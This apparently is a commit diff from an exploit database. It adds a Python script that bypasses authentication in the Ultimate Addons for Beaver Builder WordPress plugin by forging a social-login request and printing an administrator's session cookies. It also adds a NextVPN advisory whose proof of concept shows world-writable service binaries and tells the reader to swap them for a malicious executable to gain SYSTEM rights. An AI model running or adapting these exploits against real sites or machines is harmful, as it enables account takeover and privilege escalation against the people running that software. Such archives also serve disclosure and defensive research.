DB: 2020-01-01
2 changes to exploits/shellcodes NextVPN v4.10 - Insecure File Permissions Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
This commit is contained in:
parent
cd36764b57
commit
e976278a3f
3 changed files with 146 additions and 0 deletions
76
exploits/php/webapps/47832.py
Executable file
76
exploits/php/webapps/47832.py
Executable file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
|
||||
# Date: 2019-12-21
|
||||
# Exploit Authors: Raphael Karger & Nathan Hrncirik
|
||||
# Vendor Homepage: https://www.ultimatebeaver.com/
|
||||
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
|
||||
'''
|
||||
|
||||
Requirements:
|
||||
* Valid Admin/User Email Needs to be Known
|
||||
* Social Media Login Form has to be Embedded in the Specified URL
|
||||
|
||||
'''
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
import urllib.parse
|
||||
import json
|
||||
import argparse
|
||||
|
||||
banner = r''' ____ ___ _____ _______________________________ .__ .__ __
|
||||
| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
|
||||
| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
|
||||
| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
|
||||
|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
|
||||
\/ \/ \/ \/ \/|__|
|
||||
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
|
||||
'''
|
||||
|
||||
class exploit(object):
|
||||
def __init__(self, page, email):
|
||||
self.page = page
|
||||
self.sess = requests.Session()
|
||||
self.email = email
|
||||
self.nonce = False
|
||||
|
||||
def get_nonce(self):
|
||||
try:
|
||||
nonce_req = self.sess.get(self.page)
|
||||
if nonce_req.text.find("data-nonce=") != -1:
|
||||
self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
|
||||
except Exception as e:
|
||||
print("Nonce Error: {}".format(e))
|
||||
|
||||
def auth_bypass(self):
|
||||
try:
|
||||
schema = urllib.parse.urlparse(self.page)
|
||||
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
|
||||
"action" : "uabb-lf-google-submit",
|
||||
"name" : "raphaelrocks",
|
||||
"email" : self.email,
|
||||
"nonce" : self.nonce
|
||||
})
|
||||
if resp.status_code == 200:
|
||||
print("Exploit Successful, Use the Cookies to Login: \n{}".format(
|
||||
json.dumps(self.sess.cookies.get_dict(), indent=4)
|
||||
))
|
||||
except Exception as e:
|
||||
print("Auth Bypass Error: {}".format(e))
|
||||
|
||||
def begin_exploit(self):
|
||||
self.get_nonce()
|
||||
if self.nonce:
|
||||
print("Found Nonce: {}".format(self.nonce))
|
||||
self.auth_bypass()
|
||||
else:
|
||||
print("Failed to Gather Nonce")
|
||||
|
||||
if __name__ == "__main__":
|
||||
print(banner)
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
|
||||
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
|
||||
args = parser.parse_args()
|
||||
ex = exploit(args.url, args.email)
|
||||
ex.begin_exploit()
|
68
exploits/windows/local/47831.txt
Normal file
68
exploits/windows/local/47831.txt
Normal file
|
@ -0,0 +1,68 @@
|
|||
# Exploit Title: NextVPN v4.10 - Insecure File Permissions
|
||||
# Date: 2019-12-23
|
||||
# Exploit Author: SajjadBnd
|
||||
# Contact: blackwolf@post.com
|
||||
# Vendor Homepage: https://vm3max.site
|
||||
# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe
|
||||
# Version: 4.10
|
||||
# Tested on: Win10 Professional x64
|
||||
|
||||
[ Description ]
|
||||
|
||||
The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary.
|
||||
|
||||
[ PoC ]
|
||||
|
||||
C:\Users\user\AppData\Local\NextVPN>icacls *.exe
|
||||
|
||||
Helper64.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
NextVPN.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
Proxifier.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
Successfully processed 5 files; Failed processing 0 files
|
||||
and other Directories :
|
||||
|
||||
>cd openconnect
|
||||
openconnect.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
|
||||
>cd st
|
||||
|
||||
st.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
>cd update
|
||||
|
||||
update.exe NT AUTHORITY\SYSTEM:(F)
|
||||
BUILTIN\Administrators:(F)
|
||||
DESKTOP-5V14SL6\user:(F)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
[ Exploit -Privilege Escalation ]
|
||||
|
||||
ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
|
||||
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
|
||||
|
||||
|
|
@ -10854,6 +10854,7 @@ id,file,description,date,author,type,platform,port
|
|||
47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
|
||||
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
|
||||
47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
|
||||
47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
|
||||
47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
||||
|
@ -42136,3 +42137,4 @@ id,file,description,date,author,type,platform,port
|
|||
47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue